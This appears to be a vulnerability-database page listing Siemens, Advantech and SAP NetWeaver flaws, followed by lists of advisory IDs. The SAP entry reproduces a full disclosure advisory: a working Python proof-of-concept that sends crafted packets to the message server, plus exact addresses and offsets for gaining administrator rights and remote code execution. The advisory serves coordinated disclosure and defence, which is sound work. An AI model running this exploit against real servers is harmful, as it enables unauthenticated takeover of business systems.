var-202407-0490	A vulnerability has been identified in SIMATIC PCS neo V4.0 (All versions), SIMATIC STEP 7 V16 (All versions), SIMATIC STEP 7 V17 (All versions), SIMATIC STEP 7 V18 (All versions < V18 Update 2). Affected applications do not properly restrict the .NET BinaryFormatter when deserializing user-controllable input. This could allow an attacker to cause a type confusion and execute arbitrary code within the affected application. This is the same issue that exists for .NET BinaryFormatter https://docs.microsoft.com/en-us/visualstudio/code-quality/ca2300. SIMATIC PCS neo is a distributed control system (DCS). SIMATIC STEP 7 (TIA Portal) is an engineering software for configuring and programming SIMATIC controllers. Totally Integrated Automation Portal (TIA Portal) is a PC software that provides the full range of Siemens digital automation services, from digital planning, integrated engineering to transparent operation
var-201810-0396	Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwclient.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable
var-202001-0833	A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. Advisory Information Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. Vulnerability Information Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. By sending different messages, the different vulnerabilities can be triggered. 4. Vulnerable packages . Older versions are probably affected too, but they were not checked. 5. Non-vulnerable packages . Vendor did not provide this information. 6. Vendor Information, Solutions and Workarounds SAP released the security note 1800603 [2] regarding these issues. 7. Credits Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. Technical Description / Proof of Concept Code The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '39 server_name = '-'+' '39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[] Conected, sending login request" init = 'MESSAGE\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax8] lea esi, j2ee_stat_services.totalMsgCount[esi8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. Gaining remote code execution by overwriting function pointers Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[] Crash sent !" -----/ 8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[] Sending crash packet" crash = 'MESSAGE\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '(20-4) crash+= "LOLO" + ' '(40-4) crash+= " "36 send_packet(connection, crash) print "[] Crash sent !" -----/ 9. Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published. 10. References [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. About CoreLabs CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. About Core Security Technologies Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. Disclaimer The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-104 June 27, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: SAP - -- Affected Products: SAP NetWeaver - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407. - -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40 - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-27 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * e6af8de8b1d4b2b6d5ba2610cbf9cd38 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t uAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E 1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR XFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3 JqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6 wGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA== =t/ct -----END PGP SIGNATURE-----

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
jvndb-2025-000029	Multiple vulnerabilities in Quick Agent	2025-04-25T13:49+09:00	2025-04-25T13:49+09:00
jvndb-2025-000028	i-PRO Configuration Tool vulnerable to use of hard-coded cryptographic key	2025-04-24T13:50+09:00	2025-04-24T13:50+09:00
jvndb-2025-000027	Active! mail vulnerable to stack-based buffer overflow	2025-04-18T16:50+09:00	2025-04-18T16:50+09:00
jvndb-2016-000129	Android OS issue where it is affected by the CRIME attack	2016-07-25T11:15+09:00	2025-04-18T16:36+09:00
jvndb-2025-003213	TP-Link Deco BE65 Pro vulnerable to OS command injection	2025-04-11T13:52+09:00	2025-04-11T13:52+09:00
jvndb-2025-000026	Multiple vulnerabilities in BizRobo!	2025-04-10T15:36+09:00	2025-04-10T15:36+09:00
jvndb-2025-003091	Multiple vulnerabilities in Trend Micro Endpoint security products for enterprises (April 2025)	2025-04-09T14:55+09:00	2025-04-09T14:55+09:00
jvndb-2025-002990	Multiple vulnerabilities in Inaba Denki Sangyo Wi-Fi AP UNIT 'AC-WPS-11ac series'	2025-04-07T17:44+09:00	2025-04-07T17:44+09:00
jvndb-2025-002714	Improper symbolic link file handling in FutureNet NXR series, VXR series and WXR series routers	2025-03-31T16:59+09:00	2025-04-03T15:19+09:00
jvndb-2025-000025	WinRAR vulnerable to the symbolic link based "Mark of the Web" check bypass	2025-04-03T12:29+09:00	2025-04-03T12:29+09:00
jvndb-2025-000022	Multiple vulnerabilities in JTEKT ELECTRONICS CORPORATION's products	2025-04-02T15:12+09:00	2025-04-02T15:12+09:00
jvndb-2025-002790	Out-of-bounds Write vulnerabilities in Canon Printer Drivers for Production Printers, Office/Small Office Multifunction Printers and Laser Printers	2025-04-02T15:05+09:00	2025-04-02T15:05+09:00
jvndb-2025-000023	WordPress plugin "Welcart e-Commerce" vulnerable to untrusted data deserialization	2025-04-01T14:20+09:00	2025-04-01T14:20+09:00
jvndb-2024-003016	Multiple vulnerabilities in home gateway HGW BL1500HM	2024-03-25T17:28+09:00	2025-03-28T12:01+09:00
jvndb-2025-000018	Multiple vulnerabilities in home gateway HGW-BL1500HM	2025-03-19T15:33+09:00	2025-03-28T11:48+09:00
jvndb-2025-000024	a-blog cms vulnerable to untrusted data deserialization	2025-03-28T10:46+09:00	2025-03-28T10:46+09:00
jvndb-2025-000021	Multiple vulnerabilities in PowerCMS	2025-03-26T18:13+09:00	2025-03-26T18:13+09:00
jvndb-2025-002592	Multiple vulnerabilities in CHOCO TEI WATCHER mini	2025-03-26T13:25+09:00	2025-03-26T13:25+09:00
jvndb-2025-000019	Multiple vulnerabilities in AssetView	2025-03-25T17:10+09:00	2025-03-25T17:10+09:00
jvndb-2024-000117	Stack-based buffer overflow vulnerability in multiple Ricoh laser printers and MFPs which implement Web Image Monitor	2024-10-31T16:44+09:00	2025-03-25T11:39+09:00
jvndb-2025-000020	+F FS010M vulnerable to OS command injection	2025-03-18T15:01+09:00	2025-03-18T15:01+09:00
jvndb-2025-000017	hostapd vulnerable to improper processing of RADIUS packets	2025-03-12T14:19+09:00	2025-03-12T14:19+09:00
jvndb-2025-000016	Multiple vulnerabilities in RemoteView Agent (for Windows)	2025-03-06T14:27+09:00	2025-03-10T15:22+09:00
jvndb-2025-001898	Multiple vulnerabilities in FutureNet AS series (Industrial Routers) and FA series (Protocol Conversion Machine)	2025-03-04T14:56+09:00	2025-03-04T14:56+09:00
jvndb-2025-001605	"RoboForm Password Manager" App for Android vulnerable to authentication bypass using an alternate path or channel	2025-02-20T20:15+09:00	2025-02-20T20:15+09:00
jvndb-2025-000004	Multiple vulnerabilities in I-O DATA router UD-LT2	2025-01-22T13:55+09:00	2025-02-20T15:55+09:00
jvndb-2025-000014	Multiple cross-site scripting vulnerabilities in Movable Type	2025-02-19T16:19+09:00	2025-02-19T16:19+09:00
jvndb-2025-000015	RevoWorks SCVX and RevoWorks Browser vulnerable to incorrect resource transfer between spheres	2025-02-19T14:51+09:00	2025-02-19T14:51+09:00
jvndb-2025-001563	Out-of-bounds write vulnerability in FUJIFILM Business Innovation Corp. MFPs	2025-02-18T16:33+09:00	2025-02-18T16:33+09:00
jvndb-2025-001562	Out-of-bounds read vulnerability in OMRON CX-Programmer	2025-02-18T16:24+09:00	2025-02-18T16:24+09:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description
ts-2025-001	TS-2025-001
ts-2024-013	TS-2024-013
ts-2024-012	TS-2024-012
ts-2024-011	TS-2024-011
ts-2024-010	TS-2024-010
ts-2024-009	TS-2024-009
ts-2024-008	TS-2024-008
ts-2024-007	TS-2024-007
ts-2024-006	TS-2024-006
ts-2024-005	TS-2024-005
ts-2024-004	TS-2024-004
ts-2024-003	TS-2024-003
ts-2024-002	TS-2024-002
ts-2024-001	TS-2024-001
ts-2023-009	TS-2023-009
ts-2023-008	TS-2023-008
ts-2023-007	TS-2023-007
ts-2023-006	TS-2023-006
ts-2023-005	TS-2023-005
ts-2023-004	TS-2023-004
ts-2023-003	TS-2023-003
ts-2023-002	TS-2023-002
ts-2023-001	TS-2023-001
ts-2022-005	TS-2022-005
ts-2022-004	TS-2022-004
ts-2022-003	TS-2022-003
ts-2022-002	TS-2022-002
ts-2022-001	TS-2022-001

